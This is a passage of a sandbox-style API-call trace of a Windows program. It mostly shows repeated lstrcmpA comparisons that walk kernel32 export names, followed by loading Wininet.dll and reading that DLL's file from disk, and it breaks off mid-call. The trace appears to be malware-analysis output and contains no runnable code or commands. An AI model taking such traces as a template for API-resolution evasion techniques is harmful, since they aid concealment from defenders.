(lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0251.597] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0251.598] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0251.598] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0251.598] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0251.598] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0251.603] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0251.604] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.604] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.605] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0251.605] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0251.606] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0251.606] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0251.607] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0251.607] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.607] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.607] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.607] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0251.607] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0251.607] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0251.608] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0251.609] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0251.609] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0251.610] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0251.610] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0251.611] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0251.611] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0251.611] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0251.611] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0251.611] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0251.611] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0251.611] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0251.612] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0251.612] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0251.613] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0251.614] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0251.614] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0251.614] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0251.614] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0251.614] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0251.614] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0251.614] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0252.910] GetProcessHeap () returned 0x4a0000 [0252.911] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cc5f0 | out: hHeap=0x4a0000) returned 1 [0252.911] GetProcessHeap () returned 0x4a0000 [0252.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9360 [0252.911] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0252.920] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.920] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.921] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0252.921] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0252.922] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.922] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.922] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0252.922] GetProcessHeap () returned 0x4a0000 [0252.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286600) returned 0x415f040 [0252.928] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.928] ReadFile (in: hFile=0x140, lpBuffer=0x415f040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x415f040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0253.246] CloseHandle (hObject=0x140) returned 1 [0253.247] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0253.247] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0253.247] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0253.247] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0253.247] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0253.247] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.247] lstrcmpA (lpString1="AppCacheDuplicateHandle", 